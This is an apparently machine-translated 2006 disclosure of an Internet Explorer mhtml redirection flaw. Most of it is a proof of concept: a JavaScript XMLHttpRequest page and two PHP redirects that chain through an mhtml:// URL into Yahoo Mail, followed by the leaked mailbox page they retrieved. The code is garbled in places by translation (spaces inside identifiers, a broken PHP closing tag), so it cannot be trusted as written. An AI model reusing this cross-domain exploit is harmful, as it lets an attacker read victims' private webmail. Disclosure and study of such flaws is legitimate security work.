IE mhtml redirection vulnerability using the method-vulnerability warning-the black bar safety net

2006-05-20T00:00:00
ID MYHACK58:6220069206
Type myhack58
Reporter 佚名
Modified 2006-05-20T00:00:00

Description

Article author: yunshu_[At]_ph4nt0m.org Information source: http://www.ph4nt0m.org

This vulnerability is primarily an information leak, see http://secunia. com/advisories/1 9 7 3 8/specific description. In order to ensure client safety, the xmlhttp is not cross-domain access to information. But the IE security problems, in the service end through the mhtml redirection vulnerability, you can use the xmlhttp cross-domain access to sensitive information. My test is I login the Yahoo Mail thereafter, through the vulnerability can successfully get to the message information. Vulnerabilities reported to affect IE6. 0, I use IE7 the same attack.

The following is the main page through the xmlhttp request to the domain of the page. Here changed to directly access the other domain will appear Access Denied error

<html>

<head>

<script language="JavaScript">

// Start XML HTTP Request Object

var request = InitXMLHttpRequest();

function StartTest()

{

document. getElementById("result"). innerHTML = "init ok<br />";

document. getElementById("result"). innerHTML += "begain open<br /> ";

// Open/

request. open(’GET’, ’http://www.icylife.net/valu1.php’, true);

document. getElementById("result"). innerHTML += "begain send<br /> ";

request. onreadystatechange = WhenDone;

// Make the request

request. send();

}

// Function for Initialising the XMLHttpRequest

function InitXMLHttpRequest()

{

var request;

try

{

request = new XMLHttpRequest();

}

catch (trymicrosoft)

{

try

{

request = new ActiveXObject("Msxml2. XMLHTTP");

}

catch (othermicrosoft)

{

try

{

request = new ActiveXObject("Microsoft. XMLHTTP");

}

catch (failed)

{

request = false;

}

}

}

// Initialised?

if ( ! request )

{

alert("Due to limitations of your browser you will not be able to use this page.");

}

else

{

return request;

}

}

function WhenDone( )

{

if ( request. readyState == 4 )

{

document. getElementById("result"). innerHTML = request. responseText;

}

}

</script>

</head>

<body>

<b>Start the test:</b><br>

<div id="start"><a href="javascript:StartTest();"><font color="#0 0 0 0 0 0">Test Now</font></a></div>

<br />

<div id="result"></div>

</body>

</html>

Here is the second page, the use of the mhtml redirect, the code is very simple.

<? php

header("Location: mhtml://http://icylife.net/valu2.php");

?& gt;

Then the third one, the redirect to yahoo mail.

<? php

header("Location: http://mail.yahoo.com.cn/");

?& gt;

I landed a mail after the result of the attack segment is as follows:

<html>

<head><META HTTP-EQUIV="content-type" CONTENT="text/html; charset=gb2312">

<title>

Yahoo! Email - wustyunshu@yahoo.com.cn</title>

<script type="text/javascript">

<!--

if(typeof top. frames["wmailmain"] != "undefined") window. open("http://mail.yahoo.com", "_top");

// -->

</script>

<noscript>

<META HTTP-EQUIV=Refresh CONTENT="0; URL=/ym/login? nojs=1">

</noscript>